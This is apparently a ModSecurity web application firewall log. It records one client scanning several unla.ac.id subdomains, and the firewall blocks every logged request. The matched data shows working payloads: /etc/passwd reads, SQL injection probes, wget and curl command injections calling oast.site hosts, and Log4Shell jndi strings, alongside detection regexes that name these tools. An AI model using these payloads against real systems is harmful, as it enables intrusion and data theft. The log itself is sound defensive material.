[Tue Aug 29 11:31:10.343518 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAPMmGkAAAAY"]
[Tue Aug 29 11:31:10.359524 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQCvzoAAAAk"]
[Tue Aug 29 11:31:10.363022 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQEGF4AAAAm"]
[Tue Aug 29 11:31:10.364319 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQSWJ4AAAA0"]
[Tue Aug 29 11:31:10.365483 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQJWqQAAAAr"]
[Tue Aug 29 11:31:10.388727 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQUH9gAAAA2"]
[Tue Aug 29 11:31:10.391440 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlg9mt3qwmuo476f.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAQJWqUAAAAr"]
[Tue Aug 29 11:31:10.394447 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQCvzsAAAAk"]
[Tue Aug 29 11:31:10.394830 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQSWJ8AAAA0"]
[Tue Aug 29 11:31:10.394888 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQEGF8AAAAm"]
[Tue Aug 29 11:31:10.396781 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgsuid4sxao6un5.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAPDn4YAAAAP"]
[Tue Aug 29 11:31:10.396977 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAP9Hg0AAAAW"]
[Tue Aug 29 11:31:10.397620 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQFcP8AAAAn"]
[Tue Aug 29 11:31:10.404710 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgdostzf5pqchfi.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAPRNfgAAAAf"]
[Tue Aug 29 11:31:10.450918 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQR43UAAAAz"]
[Tue Aug 29 11:31:11.303450 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAQLC-QAAAAt"]
[Tue Aug 29 11:31:11.307432 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAQJWqYAAAAr"]
[Tue Aug 29 11:31:11.307670 2023] [:error] [pid 900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAOE1k8AAAAC"]
[Tue Aug 29 11:31:11.312650 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAQA-7cAAAAi"]
[Tue Aug 29 11:31:11.324570 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAPOheUAAAAa"]
[Tue Aug 29 11:31:11.343875 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAPDn4gAAAAP"]
[Tue Aug 29 11:31:11.980111 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgm4pxfttaeyukw.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAPLwD4AAAAX"]
[Tue Aug 29 11:31:11.981056 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgheke41b4i63jp.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAPDn4kAAAAP"]
[Tue Aug 29 11:31:11.985413 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgmgb5g8zboqtge.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAPOheYAAAAa"]
[Tue Aug 29 11:31:12.008988 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgyrowzh1i1np6r.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10kMCo-f0AAAQOvzsAAAAw"]
[Tue Aug 29 11:31:12.028245 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg7g7xumbumnpcs.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10kMCo-f0AAAP4H-EAAAAI"]
[Tue Aug 29 11:31:12.321038 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg69na55jn7pzax.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10kMCo-f0AAAQUH9oAAAA2"]
[Tue Aug 29 11:31:13.303681 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAQR43sAAAAz"]
[Tue Aug 29 11:31:13.308543 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgbdgyc9htuwrcr.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAP8GyUAAAAV"]
[Tue Aug 29 11:31:13.309587 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgph3ir5qz817tb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAPDn40AAAAP"]
